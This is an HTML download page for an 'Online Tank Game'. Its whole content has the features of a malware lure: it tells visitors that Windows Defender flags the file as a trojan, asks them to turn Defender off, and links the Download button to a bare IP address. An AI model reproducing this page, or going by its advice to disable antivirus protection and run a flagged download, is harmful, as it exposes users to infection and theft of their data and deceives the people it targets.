<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Online Tank Game Download Page</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
        background-color: black;
        color: white;
        text-align: center;
    }
    .container {
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        height: 60vh;
    }
    .description {
        margin-bottom: 50px;
    }
    .download-button {
        padding: 10px 20px;
        font-size: 16px;
        border: 2px solid #007bff;
        border-radius: 5px;
        background-color: #007bff;
        color: white;
        text-decoration: none;
        transition: background-color 0.3s, color 0.3s;
    }
    .download-button:hover {
        background-color: #0056b3;
    }
</style>
</head>
<body>

<h1 style="padding-top: 50px; color:yellow;">Online Tank Game Download Page</h1>

<div class="container">
    <p class="description">Windows defender detects trojan, you need to turn off windows defender.</p>
    <p class="description">Download Online Tank Game (Version: 1.0)</p>
    <a href="http://154.53.160.117/" target="_blank" class="download-button">Download</a>
</div>

</body>
</html>
